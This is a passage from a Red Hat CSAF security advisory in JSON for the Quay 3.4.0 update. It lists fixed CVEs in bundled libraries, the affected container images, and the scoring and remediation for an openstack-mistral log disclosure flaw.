{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat Quay 3.4.0 is now available with bug fixes and various\nenhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Quay 3.4.0 release\n\nSecurity Fix(es):\n\n* waitress: HTTP request smuggling through LF vs CRLF handling (CVE-2019-16785)\n\n* waitress: HTTP request smuggling through invalid Transfer-Encoding (CVE-2019-16786)\n\n* waitress: HTTP Request Smuggling through Invalid whitespace characters in headers (CVE-2019-16789)\n\n* python-pillow: Integer overflow leading to buffer overflow in ImagingLibTiffDecode (CVE-2020-5310)\n\n* python-pillow: out-of-bounds write in expandrow in libImaging/SgiRleDecode.c (CVE-2020-5311)\n\n* python-pillow: improperly restricted operations on memory buffer in libImaging/PcxDecode.c (CVE-2020-5312)\n\n* python-pillow: two buffer overflows in libImaging/TiffDecode.c due to small buffers allocated in ImagingLibTiffDecode() (CVE-2020-10379)\n\n* python-pillow: out-of-bounds reads/writes in the parsing of SGI image files in expandrow/expandrow2 (CVE-2020-11538)\n\n* openstack-mistral: information disclosure in mistral log (CVE-2019-3866)\n\n* python-pillow: uncontrolled resource consumption in FpxImagePlugin.py (CVE-2019-19911)\n\n* PyYAML: command execution through python/object/apply constructor in FullLoader (CVE-2019-20477)\n\n* python-pillow: 
out-of-bounds read in ImagingFliDecode when loading FLI images (CVE-2020-5313)\n\n* yarn: Arbitrary filesystem write via tar expansion (CVE-2020-8131)\n\n* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\n* python-pillow: multiple out-of-bounds reads in libImaging/FliDecode.c (CVE-2020-10177)\n\n* python-pillow: an out-of-bounds read in libImaging/PcxDecode.c can occur when reading PCX files (CVE-2020-10378)\n\n* python-pillow: multiple out-of-bounds reads via a crafted JP2 file (CVE-2020-10994)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:0420", "url": "https://access.redhat.com/errata/RHSA-2021:0420" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1768731", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1768731" }, { "category": "external", "summary": "1789532", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789532" }, { "category": "external", "summary": "1789533", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789533" }, { "category": "external", "summary": "1789535", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789535" }, { "category": "external", "summary": "1789538", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789538" }, { "category": "external", "summary": "1789540", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789540" }, { "category": "external", "summary": "1789807", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789807" }, { "category": "external", "summary": "1791415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791415" }, { "category": "external", "summary": "1791420", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791420" }, { "category": "external", "summary": "1806005", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1806005" }, { "category": "external", "summary": "1816261", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1816261" }, { "category": "external", 
"summary": "1852814", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852814" }, { "category": "external", "summary": "1852820", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852820" }, { "category": "external", "summary": "1852824", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852824" }, { "category": "external", "summary": "1852832", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852832" }, { "category": "external", "summary": "1852836", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852836" }, { "category": "external", "summary": "1853652", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1853652" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_0420.json" } ], "title": "Red Hat Security Advisory: Red Hat Quay v3.4.0 security update", "tracking": { "current_release_date": "2024-12-08T11:44:15+00:00", "generator": { "date": "2024-12-08T11:44:15+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:0420", "initial_release_date": "2021-02-04T16:14:00+00:00", "revision_history": [ { "date": "2021-02-04T16:14:00+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-02-04T16:14:00+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-08T11:44:15+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Quay v3", "product": { "name": "Quay v3", "product_id": "8Base-Quay-3", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3::el8" } } } ], "category": "product_family", "name": "Red Hat Quay" }, { "branches": [ { "category": "product_version", "name": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "product": { "name": 
"quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "product_id": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-bundle\u0026tag=v3.4.0-3" } } }, { "category": "product_version", "name": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "product": { "name": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "product_id": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=v3.4.0-17" } } }, { "category": "product_version", "name": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "product": { "name": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "product_id": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-openshift-bridge-rhel8-operator\u0026tag=v3.4.0-17" } } }, { "category": "product_version", "name": 
"quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "product": { "name": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "product_id": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=v3.4.0-18" } } }, { "category": "product_version", "name": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "product": { "name": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "product_id": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=v3.4.0-17" } } }, { "category": "product_version", "name": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "product": { "name": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "product_id": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "product_identification_helper": { "purl": "pkg:oci/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d?arch=amd64\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=v3.4.0-25" } } }, { "category": "product_version", "name": 
"quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "product": { "name": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "product_id": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-bundle\u0026tag=v3.4.0-2" } } }, { "category": "product_version", "name": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "product": { "name": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "product_id": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=v3.4.0-2" } } }, { "category": "product_version", "name": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "product": { "name": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "product_id": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "product_identification_helper": { "purl": 
"pkg:oci/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-bundle\u0026tag=v3.4.0-89" } } }, { "category": "product_version", "name": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "product": { "name": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "product_id": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=v3.4.0-132" } } }, { "category": "product_version", "name": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64", "product": { "name": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64", "product_id": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64", "product_identification_helper": { "purl": "pkg:oci/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=v3.4.0-51" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64" }, "product_reference": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", 
"relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64" }, "product_reference": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64" }, "product_reference": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64" }, "product_reference": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64" }, 
"product_reference": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64" }, "product_reference": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64" }, "product_reference": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64" }, "product_reference": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": 
"quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64" }, "product_reference": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64" }, "product_reference": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "relates_to_product_reference": "8Base-Quay-3" }, { "category": "default_component_of", "full_product_name": { "name": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64 as a component of Quay v3", "product_id": "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" }, "product_reference": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64", "relates_to_product_reference": "8Base-Quay-3" } ] }, "vulnerabilities": [ { "acknowledgments": [ { "names": [ "the OpenStack project" ] }, { "names": [ "Gauvain Pocentek and Cl\u00e9ment Beaufils" ], "organization": "Kindred Group PLC", "summary": "Acknowledged by upstream." 
} ], "cve": "CVE-2019-3866", "cwe": { "id": "CWE-732", "name": "Incorrect Permission Assignment for Critical Resource" }, "discovery_date": "2019-11-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1768731" } ], "notes": [ { "category": "description", "text": "An information-exposure vulnerability was discovered where openstack-mistral\u0027s undercloud log files containing clear-text information were made world readable. A malicious system user could exploit this flaw to access sensitive user information.", "title": "Vulnerability description" }, { "category": "summary", "text": "openstack-mistral: information disclosure in mistral log", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat OpenStack Platform 10/13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP10/13 openstack-mistral package.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-3866" }, { "category": "external", "summary": "RHBZ#1768731", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1768731" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-3866", "url": "https://www.cve.org/CVERecord?id=CVE-2019-3866" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-3866", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3866" } ], "release_date": "2019-11-07T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" }, { "category": "workaround", "details": "Plain text information can be masked by ensuring that all mistral log files are not world readable.", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", 
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N", "version": "3.0" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "openstack-mistral: information disclosure in mistral log" }, { "cve": "CVE-2019-16785", "cwe": { "id": "CWE-444", "name": 